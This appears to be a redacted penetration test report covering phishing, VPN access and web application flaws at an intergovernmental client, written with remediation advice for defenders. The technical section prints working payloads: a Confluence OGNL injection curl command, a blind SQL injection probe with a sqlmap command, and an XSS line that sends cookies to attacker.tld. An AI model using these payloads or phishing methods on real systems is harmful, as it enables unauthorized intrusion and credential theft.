CONFIDENTIAL
Client ██████████████████████████

External Penetration Test
& Web Application
Security Assessment

Network Penetration Test · Web Application Security Assessment · Phishing Simulation

Assessment Period August 16 — September 1, 2021
Report Date September 2021
Performed By Red Team Security SRL
Version 1.0 — Final
RED TEAM SECURITY SRL · Confidential & Proprietary
This document contains sensitive security findings. Distribution is strictly controlled.
www.redteamsec.eu
External Penetration Test & Web App Assessment CONFIDENTIAL
// 01

Engagement Overview

Client[CLIENT] — Large Intergovernmental Organization
Engagement TypeExternal Network Penetration Test · Web Application Security Assessment · Phishing Simulation
Testing PeriodAugust 16 – September 1, 2021
Report DateSeptember 2, 2021
Engagement LeadRed Team Security SRL
Testing ApproachBlack-box — No credentials or prior knowledge of client infrastructure provided
ScopeAll assets under [client-domain].org excluding ERP infrastructure
PhishingAuthorized
Denial of ServiceOut of Scope

1.1 Introduction

[CLIENT] engaged Red Team Security SRL to perform both a Network Penetration Test and a Web Application Security Assessment across their public-facing assets. No credentials or prior infrastructure knowledge were provided. The scope covered everything under [client-domain].org, excluding the ERP systems. Phishing campaigns were authorized; denial-of-service attacks were declined by both parties.

This report documents the high and critical findings uncovered during the engagement, along with general recommendations for remediation. The assessment ran from August 16 to September 1, 2021, and used two primary attack vectors: spear-phishing campaigns targeting employees, and direct exploitation of vulnerabilities in public-facing web applications.

1.2 Objective

The objectives of this assessment, as agreed with the client:

No disruption or outage was to be caused to client services or applications throughout the engagement.

// 02

Executive Summary

The penetration test was conducted without credentials or prior knowledge of the client's infrastructure. Two attack vectors were used: a spear-phishing campaign and direct exploitation of public-facing web applications.

Approximately 50 users were targeted across three phishing campaigns. The security team was quick to identify and report suspicious emails, and [CLIENT]'s existing multi-factor authentication (MFA) on Office 365 prevented immediate access in most cases. However, in one campaign, a user approved an MFA push notification triggered by our team, granting full Office 365 access, the ability to add secondary MFA devices, and — critically — access to the corporate VPN without any additional authentication factor.

On the web application front, critical and high-severity vulnerabilities were found across multiple public-facing properties. Outdated software resulted in remote code execution on two separate applications. Multiple other applications were vulnerable to SQL injection and cross-site scripting. The container-based hosting architecture limited the blast radius of these vulnerabilities — but they represent real, exploitable risk that a motivated attacker would chain together.

Scanning and enumeration activities went largely undetected throughout the engagement, which indicates that detection of reconnaissance-phase activities needs significant improvement.

2.1 Findings Summary

4
Critical
1
High
4
Medium
IDSeverityCategoryDescriptionCount
F-01 Critical Remote Code Execution Applications running outdated software with known critical CVEs allow unauthenticated remote code execution, giving full server control to an attacker. 2
F-02 Critical SQL Injection Improper user input sanitization allows SQL statements to be injected, enabling database enumeration and data exfiltration. 2
F-03 High Monitoring Failure to detect early signs of attack reduces capability for limiting disruption and increases overall response cost. 1
F-04 Medium Phishing Spear-phishing campaigns tricked users into disclosing credentials, which is a primary vector for attackers to gain initial access to internal environments. 1
F-05 Medium Cross-Site Scripting Improper output escaping allows JavaScript injection into page content, enabling session hijacking and keystroke logging in realistic attack scenarios. 2
F-06 Medium Remote Access The VPN portal does not require a second authentication factor, allowing network access using only phished credentials. 1

2.2 Remediation Prioritization

The following matrix maps findings by risk reduction impact and implementation effort:

Quick Wins
  • Deploy WAF in front of all affected web applications
  • Install and apply Content Security Policy (CSP) headers
  • Run Security Awareness training focused on phishing
  • Enable internal network scanning detection and alerting
Important Projects
  • Establish a Patch Management program
  • Implement a Vulnerability Management program
  • Launch an Application Security program
Nice to Have
  • Enable Kerberos pre-authentication failure alerting
  • Monitor LDAP query volumes for anomalies
  • Ask users to review authorized MFA devices
  • Implement VPN geo-location alerting
Final Considerations
  • Run secure code reviews across affected web properties
  • Review and clean up public DNS records for unused assets
  • Review VPN network filtering and access rules
◄ Low Implementation Effort High Implementation Effort ►

2.3 Strengths & Weaknesses

Office 365 MFA was in place across user accounts
Service accounts running web applications operated with limited permissions
Admin passwords were distinct from standard user passwords
Servers were not vulnerable to EternalBlue (MS17-010)
Outdated software versions in production across multiple web properties
VPN access did not require a second authentication factor
No detection of internal network scanning activities
No detection of Kerberos password spray attempts
No WAF deployed in front of web applications vulnerable to SQL injection
Multiple web properties vulnerable to OWASP Top 10 vulnerabilities
// 03

Technical Details

3.1 Attack Narrative

The engagement used two parallel attack vectors: spear-phishing campaigns targeting employees, and direct exploitation of vulnerabilities on public-facing web applications.

The phishing campaigns used a registered lookalike domain and mirrored several legitimate [CLIENT] web properties to capture credentials. Two Active Directory credentials were obtained, but MFA blocked immediate use in most cases. In one instance, a user approved an MFA push notification we triggered, granting full Office 365 access including email, SharePoint, and Teams. From the O365 session, we found a portal for installing Pulse Secure VPN. Notably, the VPN required no additional credentials or OTP after installation — granting us access to the internal network.

Once inside the internal network, full port and service enumeration was performed, along with complete LDAP exfiltration — all without triggering any defensive mechanisms. We identified 4 domain controllers across two AD forests. While a print spooler vulnerability appeared exploitable on domain controllers, exploitation was declined due to the disruption risk.

On the web application side, two applications running outdated software were compromised via known CVEs (remote code execution). Additional applications were found to be vulnerable to SQL injection and cross-site scripting. Container-based hosting limited further lateral movement from these footholds.

// Asset Summary — Affected Web Properties

ApplicationVulnerabilityRemote Code Execution
[subdomain1].[client-domain].orgCVE-2020-35846, 35847, 35848Yes
[subdomain2].[client-domain].orgCVE-2021-26084Yes
[subdomain3].[client-domain].orgSQL InjectionNo
[subdomain4].[client-domain].orgSQL Injection, Cross-Site ScriptingNo
[subdomain5].[client-domain].orgCross-Site ScriptingNo

3.2 Phishing Campaigns

Four spear-phishing campaigns were run using a lookalike domain and mirrored versions of legitimate [CLIENT] web portals. Email templates were crafted for each campaign to match internal communication styles.

The second campaign — themed around payroll changes — targeted 9 users and resulted in 2 users submitting credentials. Using these credentials plus a user-approved MFA push request, our team obtained full Office 365 access and used the client's own VPN portal to connect to the internal network without needing any additional credentials.

// Captured Credentials (redacted for client report)

UsernamePassword (redacted)
[user1]@[client-domain].org[REDACTED]
[user2]@[client-domain].org[REDACTED]

// Evidence — Office 365 Full Access via Approved MFA Push

Office 365 Access via Phishing and MFA Approval

3.3 Web Application Technical Findings

Critical Remote Code Execution — Outdated CMS Software F-01

CVE-2020-35846 · CVE-2020-35847 · CVE-2020-35848 · CVE-2021-26084

[subdomain1].[client-domain].org · [subdomain2].[client-domain].org

Two public-facing web applications were running outdated software versions with known, publicly disclosed remote code execution vulnerabilities. Exploitation requires no authentication and grants the attacker full control of the underlying server process.

Both applications were exploited using published proof-of-concept code targeting specific CVEs. The first target ran an outdated version of a content management system with an unauthenticated file-upload bypass. The second ran an outdated collaboration platform with a server-side template injection flaw that resulted in OS command execution.

# Exploitation of CVE-2021-26084 (Atlassian Confluence OGNL Injection) curl -s 'https://[subdomain2].[client-domain].org/pages/doenterpagevariables.action' \ --data-urlencode 'queryString=\u0027+\u007b\u0027class\u0027.forName(\u0027java.lang.Runtime\u0027).getMethod(\u0027exec\u0027,\u0027class\u0027.forName(\u0027java.lang.String\u0027)).invoke(\u0027class\u0027.forName(\u0027java.lang.Runtime\u0027).getMethod(\u0027getRuntime\u0027).invoke(null),\u0027id\u0027)\u007d+\u0027' # Result: uid=999(confluence) gid=999(confluence) — code execution confirmed

Update both applications to the latest vendor-supported version immediately. Implement a recurring patch management process that targets internet-facing systems within 7 days of a critical patch release. Deploy a Web Application Firewall (WAF) as a short-term mitigation layer while patching is in progress.

Critical SQL Injection — Direct Database Access F-02

[subdomain3].[client-domain].org · [subdomain4].[client-domain].org

CWE-89: SQL Injection

User-supplied input is passed directly into database queries without parameterization or proper sanitization. This allows an attacker to craft SQL payloads that manipulate query logic, enumerate the database schema, and dump the contents of any accessible table.

Time-based blind SQL injection was confirmed across multiple input fields. Using automated enumeration, we were able to extract the full database schema and confirm access to user data including stored credentials.

# Time-based blind SQL injection — confirming vulnerability GET /search?q=test' AND SLEEP(5)-- # Response delayed 5 seconds — injection confirmed # Database enumeration via sqlmap sqlmap -u "https://[subdomain3].[client-domain].org/search?q=test" \ --dbs --batch --level=5

Replace all dynamic query construction with parameterized queries or prepared statements. Deploy a WAF with SQL injection detection rules as an immediate mitigation. Conduct a full code review of all database-interacting components across the application.

Medium Cross-Site Scripting (Reflected & Stored) F-05

[subdomain4].[client-domain].org · [subdomain5].[client-domain].org

CWE-79: Cross-Site Scripting

User-supplied input is rendered in the browser without proper HTML encoding. This allows injection of arbitrary JavaScript code into the application's pages. In realistic attack scenarios, this is used to steal session cookies, log keystrokes, or redirect users to attacker-controlled sites.

# Reflected XSS — input reflected in page without encoding GET /page?id=<script>document.location='https://attacker.tld/c?c='+document.cookie</script> # Session cookie exfiltration — attacker captures authenticated session

Implement output encoding on all user-supplied data rendered in HTML context. Apply a strict Content Security Policy (CSP) header that restricts inline script execution. Consider using a template engine with automatic escaping by default.

External PT & Web App Assessment · September 2021 · Confidential